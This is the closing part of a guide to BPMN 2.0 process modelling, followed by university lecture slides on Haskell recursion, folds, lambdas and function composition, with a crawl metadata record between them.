**Repeating** Used to repeat behavior, such as multiple launches of the same task (multi-instantiation) or repeating the same task (looping) The 3 levels of BPMN complexity BPMN at 3 levels of complexity BPMN symbols serve a dual purpose. They visually represent a process flow. They translate to executable code that allows a visual process model to be executed as an application. 
Recall that we can organize BPMN modeling elements into a few general categories: - **Workflow** - **Organizing** - **Readability** - **Special behavior** Let's look at these BPMN elements at the three levels of complexity: **Basic, Intermediate and Advanced** <table> <thead> <tr> <th></th> <th>Basic</th> <th>Intermediate</th> <th>Advanced</th> </tr> </thead> <tbody> <tr> <td><strong>Activities</strong></td> <td>Abstract task</td> <td>Human task</td> <td>Event subprocess</td> </tr> <tr> <td></td> <td></td> <td>Service task</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Call activity</td> <td></td> </tr> <tr> <td><strong>Events</strong></td> <td>start</td> <td>Message</td> <td>(special behavior)</td> </tr> <tr> <td></td> <td>end</td> <td>Timer</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Error</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Signal</td> <td></td> </tr> <tr> <td><strong>Gateways</strong></td> <td>Parallel (AND)</td> <td>Inclusive</td> <td></td> </tr> <tr> <td></td> <td>Exclusive (XOR)</td> <td></td> <td></td> </tr> <tr> <td><strong>Sequence flow</strong></td> <td>Sequence flow</td> <td>Conditional flow</td> <td>Looping</td> </tr> <tr> <td></td> <td></td> <td>Default flow</td> <td>Multi-instantation</td> </tr> <tr> <td><strong>Special behavior</strong></td> <td></td> <td></td> <td>Transaction</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Compensation</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Correlation</td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> </tr> </tbody> </table> Note that Basic BPMN is predominantly **visual**. Intermediate and Advanced BPMN becomes **executable**. Basic BPMN is useful for modeling when details have not been worked out. Activities, events, gateways, and sequence flow all have Basic BPMN level versions. Basic activities are abstract, or undefined. Basic events include start and end events. A start begins a process and an end terminates it. **Basic gateways** **Parallel** (also known as AND) All inputs must be received (in any order) before the process can continue. All outputs are activated – process continues in parallel. **Exclusive** (also known as XOR) Only one input is needed for the process to continue. Only one output is followed – a condition is needed to determine which one. **Sequence flow** simply directs process flow from activity to activity. Start with the basics: abstract activity, start and stop events, gateways, and sequence flow. For example, a generic new employee orientation and training process modeled in basic BPMN elements looks like this. Imagine a token being moved through the diagram – like a traditional board game. This can help clarify how the features of the model control the movement of the token as you add complexity. When a start event is triggered, a new “instance” of a process begins. Think through what happens to a single token traversing a single pathway at a time. BPMN 2.0, Thomas Allweyer Intermediate BPMN To make a visual model executable, begin to apply intermediate BPMN. In an executable process, the flow model becomes an actual process application! As you advance with BPMN, begin making your BPMN “executable” – to ultimately turn it into an automated process. BPMN 2.0 is not just a notation. Implemented through a BPMN modeling tool, it provides programming instruction that a process engine uses to execute the process. The previous example is a simple model that clearly shows visually what happens in the process. 
The example on this page and the next shows how the model is extended as you begin to apply intermediate BPMN. New employee orientation and training process Note that activities have been defined, and default flow has been added. Intermediate BPMN: activities Intermediate-level activities include human, service, and call activity Activities need to be differentiated – is each task performed by a person or is it automated or performed by the software? Or is it a subprocess in its own right? - **Human activity** is a step that must be done by a person - **Service activity** is an automated step - **Call activity** represents a subprocess "Prepare training schedule" is a call activity. It is linked to a subprocess (a "child" of the original parent process). At this point in the process, the "token" is passed to the subprocess, and when it has completed its passage, it is passed back to the parent process. This is a super-useful aspect of BPMN. Using this notation, you can model a top-level parent process that can be quite simple. It can call a series of subprocesses that are entirely independent workflows. This means they can be modeled independently and modified as needed without necessarily changing the parent process. Intermediate BPMN: sequence flow Intermediate-level sequence flow includes **conditional** and **default** flows. Sequence flow in intermediate BPMN needs to be defined as conditional or default, so the “flow token” knows which path to follow. Basic sequence flow is simply automatic (as soon as an activity is completed, the process moves to the next task in the sequence). **Conditional sequence flow** Some specified condition(s) must be met so the process can “choose” the next task from among two or more options. Conditional flow is what it sounds like: an IF-THEN condition is defined. In this (Boolean) example: - If the schedule is ok with the trainer, this condition = true. - If the schedule is NOT ok with the trainer, this condition = false. **Default sequence flow** **Default flow** allows you to direct flow if, for some reason, no conditions are met. The flow token always has a direction to take. Default flow is marked with a `\` Sequence flow can’t cross a pool boundary. To communicate between pools (processes), use *messages or signals*. Intermediate BPMN: gateways The intermediate-level gateway *inclusive* offers finer control of process flow. **Outputs from inclusive gateway** The inclusive gateway can fire multiple outputs simultaneously. It supports conditions on the outgoing sequence flows. **Example** <table> <thead> <tr> <th>Condition</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>amount</td> <td>5000</td> </tr> <tr> <td>color</td> <td>red</td> </tr> </tbody> </table> In this example, flows 2 and 4 meet the flow condition. Flows 1 and 3 do not – so no token passes. **Inputs to inclusive gateway** The inclusive gateway waits for all incoming inputs (tokens). All valid inputs must be received before the process flow can continue. The engine recognizes which inputs it must wait for (i.e., flows 2 and 4). Intermediate BPMN events: catch and throw Intermediate-level events are either *throw* or *catch* events. Mastery of special start, end, and in-flow “intermediate” events is key to mastery of intermediate BPMN. BPMN events are defined generally as “throw” (think of these as senders) and “catch” (think of these as receivers.) **Mix-n-match events** Events can have multiple characteristics. 
- **solid** - throws or sends events - **empty** - catches or receives events - **green** starts a process - **red** ends a process - **blue** intermediate, takes place within the flow of a process A catch event can be located anywhere along a process flow. The BPMN spec somewhat confusingly refers to this case as an “intermediate event.” If you stick to thinking of events as throw/send and catch/receive, BPMN may be easier to understand. Message, signal and error start events allow you to trigger processes without direct human interaction, as they are set to “catch” information send from elsewhere. “Elsewhere” can mean from a throw event somewhere in another process, and this can be an end event. In this case, the end of one process can trigger the start of another process. Timers too can start processes automatically, by triggering at pre-set intervals. Intermediate BPMN events: messages and signals Messages and signals carry information across pool boundaries. Messages send to single receivers, while signals broadcast widely to many receivers. **Message** You can start a process with a message. In BPMN, message is specifically defined as the means by which data can be transferred between processes. With BPMN you can start a process with data received from a different process. And conversely, if you want to send data to another process, use an intermediate send message (anywhere in the process flow) or an end message. **Signal** Like messages and errors, signals can be caught from elsewhere and can start a process. A single “throw” signal is broadcast widely and can be received by multiple catch signals. This is useful when you want multiple actions to be triggered. Intermediate BPMN events: timers and errors Timers can delay or pause a process, while errors send it on an exception path. Like other intermediate events, timers and errors can start a process - or impose an action within the process flow. Errors can also end a process. **Timer** Timers can be set to "go off" at specific intervals, or specific calendar-linked dates and times. For example, a start timer can go off every 24 hours, or on the first Tuesday of each month. If the timer is a start event, the process starts when the timer goes off. If the timer is located in the process flow, the process waits until the timer goes off – and then it continues. **Error** Like messages, errors can be caught - and can start a process, or a special error path within a sub-process. Messages, signals, timers, and errors specify workflow behavior. Summary With just 4 categories of basic and intermediate BPMN you can begin to build a deployable, executable process application. BPMN is a standard that allows business and IT to share a common language, which makes development of BPM applications for business by IT easier and more efficient. BPMN is both a set of visual modeling elements, and a set of semantics for executable code represented by those elements. Many of the visual elements in BPMN are similar to standard flow chart elements. Modeling with and interpreting models with BPMN is relatively straightforward. BPMN elements can be categorized: - Workflow - Organizing - Readability - Special behavior There are Basic, Intermediate, and Advanced elements in each of these categories. Basic BPMN is useful for modeling. Intermediate BPMN begins to make a model executable. Advanced BPMN fully defines process behavior. If you’re designing a BPM software suite, read the BPMN2 spec... 
If you’re designing process applications, The Ultimate Guide is what you really need! Sources and further reading *BPMN Method and Style*, 2nd ed, Bruce Silver, October 2011 *OMG Business Process Model and Notation (BPMN)* Version 2.0, January 2011 *BPMN 2.0: Introduction to the Standard for Business Process Modeling*, Thomas Allweyer, February 2010 *See More* Introduction to BPMN Object Management Group The [nearly] Ultimate Guide to Ending Email Overload 5 Common Pitfalls in Process Optimization Manage Purchasing Efficiently with BPM What is BPM?
{"Source-Url": "http://www.downes.ca/files/Ultimate_guide_to_bpmn2.pdf", "len_cl100k_base": 4671, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 45184, "total-output-tokens": 5425, "length": "2e12", "weborganizer": {"__label__adult": 0.0002536773681640625, "__label__art_design": 0.0006928443908691406, "__label__crime_law": 0.0003428459167480469, "__label__education_jobs": 0.0012493133544921875, "__label__entertainment": 0.00011521577835083008, "__label__fashion_beauty": 0.0001392364501953125, "__label__finance_business": 0.0047607421875, "__label__food_dining": 0.00032210350036621094, "__label__games": 0.0005135536193847656, "__label__hardware": 0.00040340423583984375, "__label__health": 0.0002799034118652344, "__label__history": 0.0001590251922607422, "__label__home_hobbies": 0.0001118779182434082, "__label__industrial": 0.00043654441833496094, "__label__literature": 0.0002663135528564453, "__label__politics": 0.00017523765563964844, "__label__religion": 0.0002765655517578125, "__label__science_tech": 0.00763702392578125, "__label__social_life": 0.0001341104507446289, "__label__software": 0.1304931640625, "__label__software_dev": 0.8505859375, "__label__sports_fitness": 0.00021016597747802737, "__label__transportation": 0.00022780895233154297, "__label__travel": 0.0001697540283203125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20753, 0.01506]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20753, 0.47302]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20753, 0.92354]], "google_gemma-3-12b-it_contains_pii": [[0, 143, false], [143, 866, null], [866, 2314, null], [2314, 2332, null], [2332, 4022, null], [4022, 5434, null], [5434, 5459, null], [5459, 6546, null], [6546, 7194, null], [7194, 7713, null], [7713, 8185, null], [8185, 8957, null], [8957, 8989, null], [8989, 11403, null], [11403, 12128, null], [12128, 12713, null], [12713, 13489, null], [13489, 14503, null], [14503, 15569, null], [15569, 16280, null], [16280, 17550, null], [17550, 18383, null], [18383, 19167, null], [19167, 19232, null], [19232, 20276, null], [20276, 20753, null]], "google_gemma-3-12b-it_is_public_document": [[0, 143, true], [143, 866, null], [866, 2314, null], [2314, 2332, null], [2332, 4022, null], [4022, 5434, null], [5434, 5459, null], [5459, 6546, null], [6546, 7194, null], [7194, 7713, null], [7713, 8185, null], [8185, 8957, null], [8957, 8989, null], [8989, 11403, null], [11403, 12128, null], [12128, 12713, null], [12713, 13489, null], [13489, 14503, null], [14503, 15569, null], [15569, 16280, null], [16280, 17550, null], [17550, 18383, null], [18383, 19167, null], [19167, 19232, null], [19232, 20276, null], [20276, 20753, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], 
[5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20753, null]], "pdf_page_numbers": [[0, 143, 1], [143, 866, 2], [866, 2314, 3], [2314, 2332, 4], [2332, 4022, 5], [4022, 5434, 6], [5434, 5459, 7], [5459, 6546, 8], [6546, 7194, 9], [7194, 7713, 10], [7713, 8185, 11], [8185, 8957, 12], [8957, 8989, 13], [8989, 11403, 14], [11403, 12128, 15], [12128, 12713, 16], [12713, 13489, 17], [13489, 14503, 18], [14503, 15569, 19], [15569, 16280, 20], [16280, 17550, 21], [17550, 18383, 22], [18383, 19167, 23], [19167, 19232, 24], [19232, 20276, 25], [20276, 20753, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20753, 0.10332]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
057a6b32fca0a3ab3f7f62f34c17e673faffc2fb
Recursion and Higher-Order Functions Stephen A. Edwards Columbia University Fall 2019 Recursion in Haskell Pattern matching works nicely: ```haskell recfun <base case> = <base value> recfun <part> <rest> = <some work> <part> <combined with> recfun <rest> ``` ``` maximum' :: Ord a => [a] -> a maximum' [] = error "empty list" maximum' [x] = x -- base case maximum' (x:xs) | x > maxTail = x -- found a new maximum | otherwise = maxTail where maxTail = maximum' xs -- recurse ``` The list elements need to be ordered so we can perform > on them `maximum` is part of the standard prelude; you do not need to write this Far better: build the solution out of helpful pieces, even if they are small. It is efficient; GHC aggressively inlines code to avoid function call overhead ```haskell max' :: Ord a => a -> a -> a max' a b | a > b = a | otherwise = b maximum' :: Ord a => [a] -> a maximum' [] = error "empty list" maximum' [x] = x maximum' (x:xs) = x `max` maximum' xs ``` This is still twice as complicated as it needs to be; we’ll revisit this later. Replicate and Take replicate' :: (Num n, Ord n) => n -> a -> [a] replicate' n x | n <= 0 = [] | otherwise = x : replicate' (n-1) x The Num typeclass (-) does not include Ord (for <=), so Ord is needed. Used a guard since we’re testing a condition \( n \leq 0 \) rather than a constant. take' :: (Num n, Ord n) => n -> [a] -> [a] take' n _ | n <= 0 = [] -- base case take' _ [] = [] -- base case take' n (x:xs) = x : take' (n-1) xs -- recurse Replicate and Take Revisited The Standard Prelude implementation uses infinite lists \[ \begin{align*} take' &: (\text{Num } n, \text{Ord } n) \Rightarrow n \rightarrow [a] \rightarrow [a] \\ take' n _ | n \leq 0 &= [] \\ take' _ [] &= [] \\ take' n (x:xs) &= x : \text{take'} (n-1) \text{xs} \end{align*} \] \[ \begin{align*} \text{repeat'} &: a \rightarrow [a] \\ \text{repeat'} x = xs \text{ where } xs &= x : xs \\ & \quad \text{-- Infinite list} \end{align*} \] \[ \begin{align*} \text{replicate'} &: (\text{Num } n, \text{Ord } n) \Rightarrow n \rightarrow a \rightarrow [a] \\ \text{replicate'} n x &= \text{take'} n (\text{repeat'} x) \end{align*} \] Zip: Combine Two Lists Into a List of Pairs ```haskell zip' :: [a] -> [b] -> [(a,b)] zip' [] _ = [] zip' _ [] = [] zip' (x:xs) (y:ys) = (x,y) : zip' xs ys ``` Works nicely with lists of mismatched lengths, including infinite: ```haskell *Main> zip' [0..3] [1..5] :: [(Int, Int)] [(0,1),(1,2),(2,3),(3,4)] *Main> zip' "abc" ([1..] :: [Int]) [('a',1),('b',2),('c',3)] ``` Quicksort in Haskell - Pick and remove a pivot - Partition into two lists: smaller or equal to and larger than pivot - Recurse on both lists - Concatenate smaller, pivot, then larger quicksort :: Ord a => [a] -> [a] quicksort [] = [] quicksort (p:xs) = quicksort [x | x <- xs, x <= p] ++ [p] ++ quicksort [x | x <- xs, x > p] Efficient enough: ++ associates to the right so \( a \; ++ \; b \; ++ \; c \) is \( (a \; ++ \; (b \; ++ \; c)) \) Haskell does not have classical `for` or `do` loops. Recursion can implement either of these plus much more. Tail-recursion is just as efficient as such loops. Most of the time, however, your loop or recursive function fits a well-known pattern that is already in a Standard Prelude function that you should use instead. A key advantage of functional languages, including Haskell, is that you can build new control constructs. 
Partially Applied Functions

The (+) syntax also permits a single argument to be applied on either side and returns a function that takes the "missing" argument:

```haskell
Prelude> (++ ", hello") "Stephen"
"Stephen, hello"
Prelude> ("Hello, " ++) "Stephen"
"Hello, Stephen"
Prelude> (<= (5::Int)) 10
False
Prelude> (<= (5::Int)) 5
True
Prelude> (<= (5::Int)) 4
True
```

- is weird because (-4) means negative four. Use subtract:

```haskell
Prelude> (subtract 4) 10
6
```

Higher-Order Functions

Passing functions as arguments is routine yet powerful

```
Prelude> :{
Prelude| applyTwice :: (a -> a) -> a -> a
Prelude| applyTwice f x = f (f x)
Prelude| :}
Prelude> applyTwice (+5) 1
11
Prelude> applyTwice (++ " is stupid") "Stephen"
"Stephen is stupid is stupid"
```

"applyTwice takes a function and returns a function that takes a value and applies the function to the value twice"

Flip

Standard Prelude function that reverses the order of the first two arguments

```haskell
flip' :: (a -> b -> c) -> (b -> a -> c)
flip' f = g
  where g x y = f y x
```

But since the "function type" operator -> associates right-to-left,

```haskell
flip' :: (a -> b -> c) -> b -> a -> c
flip' f x y = f y x
```

```haskell
Prelude> zip [1..5] "Hello"
[(1,'H'),(2,'e'),(3,'l'),(4,'l'),(5,'o')]
Prelude> flip zip [1..5] "Hello"
[('H',1),('e',2),('l',3),('l',4),('o',5)]
Prelude> zipWith (flip div) [2,2..] [10,8..2]
[5,4,3,2,1]
```

Map

A Standard Prelude function. Two equivalent ways to code it:

```haskell
map' :: (a -> b) -> [a] -> [b]
map' _ [] = []
map' f (x:xs) = f x : map' f xs
```

```haskell
map'' :: (a -> b) -> [a] -> [b]
map'' f xs = [ f x | x <- xs ]
```

```haskell
*Main> map (+5) ([1..5] :: [Int])
[6,7,8,9,10]
*Main> map (++ "!") ["BIFF","BAM","POW"]
["BIFF!","BAM!","POW!"]
```

You've written many loops that fit map in imperative languages

Another Standard Prelude function `zipWith` takes a function and two lists and applies the function to the list elements, like a combination of `zip` and `map`:

```haskell
zipWith' :: (a -> b -> c) -> [a] -> [b] -> [c]
zipWith' _ [] _ = []
zipWith' _ _ [] = []
zipWith' f (x:xs) (y:ys) = f x y : zipWith' f xs ys
```

The Standard Prelude implements `zip` with `zipWith`:

```haskell
zip' :: [a] -> [b] -> [(a,b)]
zip' = zipWith (,)  -- the "make-a-pair" operator
```

Filter: Select each element of a list that satisfies a predicate

```haskell
filter :: (a -> Bool) -> [a] -> [a]
filter _ [] = []
filter p (x:xs) | p x       = x : filter p xs
                | otherwise = filter p xs
```

```haskell
filter :: (a -> Bool) -> [a] -> [a]
filter p xs = [ x | x <- xs, p x ]
```

```haskell
Prelude> filter (>= 3) [1..10] :: [Int]
[3,4,5,6,7,8,9,10]
```

What's the largest number under 100,000 that's divisible by 3,829?

```haskell
Prelude> x `divides` y = y `mod` x == 0
Prelude> head (filter (3829 `divides`) [100000,99999..])
99554
```
Also part of the Standard Prelude ```haskell takeWhile' :: (a -> Bool) -> [a] -> [a] takeWhile' _ [] = [] takeWhile' p (x:xs) | p x = x : takeWhile' p xs | otherwise = [] ``` Prelude> takeWhile (/= ' ') "Word splitter function" "Word" What’s the sum of all odd squares under 10,000? ```haskell Prelude> sum (takeWhile (<10000) (filter odd (map (^2) [1..]))) 166650 Prelude> sum (takeWhile (<10000) [ n^2 | n <- [1..], odd (n^2) ]) 166650 ``` Twin Primes differ by two, e.g., 3 and 5, 11 and 13, etc. ```haskell Prelude> primes = f [2..] where Prelude| f (p:xs) = p : f [ x | x <- xs, x `mod` p /= 0 ] Prelude> twinPrimes = filter twin (zip primes (tail primes)) where Prelude| twin (a,b) = a+2 == b Prelude> take 7 twinPrimes [(3,5),(5,7),(11,13),(17,19),(29,31),(41,43),(59,61)] Prelude> length twinPrimes (Left as an exercise for the reader) Collatz sequences For starting numbers between 1 and 100, how many Collatz sequences are longer than 15? collatz :: Int -> [Int] collatz 1 = [1] collatz n | even n = n : collatz (n `div` 2) | otherwise = n : collatz (n * 3 + 1) numLongChains :: Int numLongChains = length (filter isLong (map collatz [1..100])) where isLong xs = length xs > 15 *Main> collatz 30 [30,15,46,23,70,35,106,53,160,80,40,20,10,5,16,8,4,2,1] *Main> numLongChains 66 **Lambda Expressions** A *lambda expression* is an unnamed function. \ is a λ missing a leg: \ \ <\text{args}> \rightarrow <\text{expr}> Things like (+ 5) and max 5 are also unnamed functions, but the lambda syntax is more powerful. Without a Lambda expression: ```haskell numLongChains = length (filter isLong (map collatz [1..100])) where isLong xs = length xs > 15 ``` Using Lambda: ```haskell numLongChains = length (filter (\xs -> length xs > 15) (map collatz [1..100])) ``` Lambda Expressions Multiple and pattern arguments: Prelude> zipWith (\a b -> a * 100 + b) [5,4..1] [1..5] [501,402,303,204,105] Prelude> map (\(a,b) -> a + b) [(1,2),(3,5),(6,3),(2,6),(2,5)] [3,8,9,8,7] Function definitions are just convenient shorthand for Lambda expressions: ``` addThree :: Num a => a->a->a->a addThree x y z = x + y + z ``` Some Lambdas are unnecessary: Prelude> zipWith (\x y -> x + y) [1..5] [100,200..500] [101,202,303,404,505] Prelude> zipWith (+) [1..5] [100,200..500] [101,202,303,404,505] Fold: Another Foundational Function Apply a function to each element to accumulate a result: \[ \text{foldl } f \ z \ [a_1,a_2,\ldots,a_n] = f \ldots(f \ (f \ z \ a_1) \ a_2)\ldots \ a_n \] \[ \text{foldl} :: (a \to b \to a) \to a \to [b] \to a \] \[ \text{foldl } f \ z \ [] = z \] \[ \text{foldl } f \ z \ (x:xs) = \text{foldl } f \ (f \ z \ x) \ xs \] Prelude> 0 + 1 + 2 + 3 + 4 + 5 15 Prelude> foldl (\acc x -> acc + x) 0 [1..5] 15 Prelude> foldl (+) 0 [1..5] 15 \[ \text{sum} :: \text{Num } a \to [a] \to a \] \[ \text{sum} = \text{foldl } (+) 0 \quad -- \text{Standard Prelude definition} \] Foldl† in action \[ \text{foldl} \quad :: \quad (a \rightarrow b \rightarrow a) \rightarrow a \rightarrow [b] \rightarrow a \] \[ \begin{align*} \text{foldl} \ f \ z \ [] & = z \\ \text{foldl} \ f \ z \ (x:xs) & = \text{foldl} \ f \ (f \ z \ x) \ xs \end{align*} \] \[ \begin{align*} \text{foldl} \ f \ 100 \ [1..3] \ \text{where} \ f & = \ \lambda z \ x \rightarrow z + x \quad -- \ a.k.a. 
Foldl† in action

```haskell
foldl :: (a -> b -> a) -> a -> [b] -> a
foldl f z []     = z
foldl f z (x:xs) = foldl f (f z x) xs
```

      foldl f 100 [1..3]   where f = \z x -> z + x   -- a.k.a. (+)
    = foldl f 100 [1,2,3]
    = foldl f (f 100 1) [2,3]    -- Evaluate foldl: apply f to z and x
    = foldl f 101       [2,3]    -- Evaluate f: add z and x
    = foldl f (f 101 2) [3]
    = foldl f 103       [3]
    = foldl f (f 103 3) []
    = foldl f 106       []       -- Base case: return z
    = 106

† Technically, this is foldl' in action; it gives the same result.

foldl1: foldl starting from the first element

```haskell
foldl :: (a -> b -> a) -> a -> [b] -> a
foldl f z []     = z
foldl f z (x:xs) = foldl f (f z x) xs

foldl1 :: (a -> a -> a) -> [a] -> a
foldl1 f (x:xs) = foldl f x xs    -- Start with the list's head
foldl1 _ []     = error "Prelude.foldl1: empty list"
```

foldl vs. foldr

foldl works from the left, foldr from the right; the folding function's arguments are reversed:

\[ \text{foldl}\ f\ z\ [a_1, a_2, \ldots, a_n] = f\,(\cdots(f\,(f\ z\ a_1)\ a_2)\cdots)\ a_n \]
\[ \text{foldr}\ f\ z\ [a_1, a_2, \ldots, a_n] = f\ a_1\,(f\ a_2\,(\cdots(f\ a_n\ z)\cdots)) \]

```haskell
foldl :: (a -> b -> a) -> a -> [b] -> a
foldl f z []     = z
foldl f z (x:xs) = foldl f (f z x) xs    -- f = \acc x -> ...

foldr :: (b -> a -> a) -> a -> [b] -> a
foldr f z []     = z
foldr f z (x:xs) = f x (foldr f z xs)    -- f = \x acc -> ...
```

Folds Are Extremely Powerful: They’re Everywhere

```haskell
concat :: [[a]] -> [a]
concat xss = foldr (++) [] xss

reverse :: [a] -> [a]
reverse = foldl (\a x -> x : a) []   -- Lambda expression version
reverse = foldl (flip (:)) []        -- Prelude definition

and, or :: [Bool] -> Bool
and = foldr (&&) True
or  = foldr (||) False

sum, product :: Num a => [a] -> a
sum     = foldl (+) 0
product = foldl (*) 1

maximum, minimum :: Ord a => [a] -> a
maximum [] = error "Prelude.maximum: empty list"
maximum xs = foldl1 max xs
minimum [] = error "Prelude.minimum: empty list"
minimum xs = foldl1 min xs
```

Folds Subsume map and filter

```haskell
map' :: (a -> b) -> [a] -> [b]
map' f xs = foldr (\x acc -> f x : acc) [] xs
```

A left fold also works, but is less efficient because of ++:

```haskell
map' f xs = foldl (\acc x -> acc ++ [f x]) [] xs
```

Filter is like a conditional map:

```haskell
filter' :: (a -> Bool) -> [a] -> [a]
filter' p = foldr (\x acc -> if p x then x : acc else acc) []
```

The Standard Prelude uses the recursive definitions of map and filter

Foldr Evaluates Left-to-Right Because Haskell is Lazy

Haskell’s *undefined* throws an exception *only when it is evaluated*

```haskell
undefined :: a
undefined = error "Prelude.undefined"
```

\[ \text{foldr}\ f\ z\ [a_1,a_2,\ldots,a_n] = f\ a_1\,(f\ a_2\,(\cdots(f\ a_n\ z)\cdots)) \]

```haskell
Prelude> quitZero x acc = if x == 0 then 0 else x + acc
Prelude> foldr quitZero 0 [3,2,1,0]
6
Prelude> foldr quitZero 0 [3,2,1,0,100]
6
Prelude> foldr quitZero 0 [3,2,1,undefined]
*** Exception: Prelude.undefined
Prelude> foldr quitZero 0 [3,2,1,0,undefined]
6
```
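As a side note (my own example, reusing quitZero from above): laziness even lets foldr produce an answer from an infinite list, provided the folding function stops looking at its accumulator at some point.

```haskell
Prelude> foldr quitZero 0 ([3,2,1,0] ++ [1..])   -- the infinite tail is never examined
6
```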
[Cartoon] Two logicians walk into a bar... "Does everyone want beer?" "I don't know." "I don't know." "Yes!"

&& and || are Short-Circuit Operators

```haskell
(&&), (||) :: Bool -> Bool -> Bool
True  && x = x
False && _ = False
True  || _ = True
False || x = x

and, or :: [Bool] -> Bool
and = foldr (&&) True
or  = foldr (||) False
```

```haskell
Prelude> or [True, True, undefined]
True
Prelude> and [True, True, undefined]
*** Exception: Prelude.undefined
Prelude> and [True, False, undefined]
False
Prelude> or [False, True, undefined]
True
Prelude> or [False, False, undefined]
*** Exception: Prelude.undefined
```

Foldl Evaluates Left-to-Right Because of Laziness

```haskell
foldl :: (a -> b -> a) -> a -> [b] -> a
foldl f z []     = z                    -- (base)
foldl f z (x:xs) = foldl f (f z x) xs   -- (recurse)
```

      foldl f 100 [1..3]   where f = \z x -> z + x
    = foldl f 100 [1,2,3]                  -- expand range
    = foldl f (f 100 1) [2,3]              -- (recurse)
    = foldl f (f (f 100 1) 2) [3]          -- (recurse)
    = foldl f (f (f (f 100 1) 2) 3) []     -- (recurse)
    = f (f (f 100 1) 2) 3                  -- (base)
    = (f (f 100 1) 2) + 3                  -- (f)
    = (f 100 1) + 2 + 3                    -- (f)
    = 100 + 1 + 2 + 3                      -- (+)
    = 101 + 2 + 3                          -- (+)
    = 103 + 3                              -- (+)
    = 106                                  -- (+)

Unlike the earlier foldl' trace, the additions here are deferred until the base case, so the unevaluated expression (the thunk) grows with the length of the list; the final result is still 106.

Scanl and Scanr: Fold Remembering Accumulator Values

```haskell
scanl :: (a -> b -> a) -> a -> [b] -> [a]
scanl f q xs = q : (case xs of
                      []   -> []
                      x:xs -> scanl f (f q x) xs)

scanr :: (b -> a -> a) -> a -> [b] -> [a]
scanr f q0 []     = [q0]
scanr f q0 (x:xs) = f x q : qs
  where qs@(q:_) = scanr f q0 xs
```

```haskell
Prelude> foldl (+) 0 [1..5]
15
Prelude> scanl (+) 0 [1..5]
[0,1,3,6,10,15]
Prelude> scanr (+) 0 [1..5]
[15,14,12,9,5,0]
```

Scanl and takeWhile Can Mimic a Do Loop

How many square roots added together just exceed 1000?

```haskell
Prelude> length (takeWhile (<1000) (scanl1 (+) (map sqrt [1..])))
130
Prelude> sum (map sqrt [1..130])
993.6486803921487
Prelude> sum (map sqrt [1..131])
1005.0942035344083
```

130 partial sums stay below 1000, so it is the 131st square root that pushes the total past 1000.

Avoiding LISP† with $

Many functions put their complex-to-compute arguments at the end; applying these in sequence gives expressions of the form f ... (g ... (h ...))

Use $ to eliminate the ending parentheses. It is right-associative at the lowest precedence, so f $ g $ h x is f (g (h x)). Normal argument application (juxtaposition) is at the highest precedence.

```haskell
infixr 0 $            -- Right-associative, lowest precedence
($) :: (a -> b) -> a -> b
f $ x = f x
```

```haskell
Prelude> length (takeWhile (<1000) (scanl1 (+) (map sqrt [1..])))
130
Prelude> length $ takeWhile (<1000) $ scanl1 (+) $ map sqrt [1..]
130
```

† Lots of Irritating, Silly Parentheses

Applying an Argument as a Function

$ is the *function application* operator: it applies the function on its left to the argument on its right. Juxtaposition does the same thing without an explicit operator.

```haskell
Prelude> map ($ 3) [ (4+), (10*), (^2), sqrt ]
[7.0,30.0,9.0,1.7320508075688772]
```

($ 3) is the "apply 3 as an argument to the function" function, equivalent to \f -> f 3.

Function Composition

In math notation, \((f \circ g)(x) = f(g(x))\); in Haskell,

```haskell
infixr 9 .            -- Right-associative, highest precedence
(.) :: (b -> c) -> (a -> b) -> a -> c
f . g = \x -> f (g x)
```

So (f . g . h) x is f (g (h x))

```haskell
Prelude> map (\x -> negate (abs x)) [5,-3,-6,7,-3,2,-19,24]
[-5,-3,-6,-7,-3,-2,-19,-24]
Prelude> map (negate . abs) [5,-3,-6,7,-3,2,-19,24]
[-5,-3,-6,-7,-3,-2,-19,-24]
```

Best used when constructing functions to pass as an argument
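Composition earns its keep precisely when building functions to hand to other functions. As a small illustration of the style (my rewrite, not from the slides), the earlier numLongChains can be written point-free, assuming collatz is in scope:

```haskell
-- Read right to left: build the chains, keep the ones longer than 15, count them.
numLongChains' :: Int
numLongChains' = length . filter ((> 15) . length) . map collatz $ [1..100]
```

It evaluates to 66, just like the original definition.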
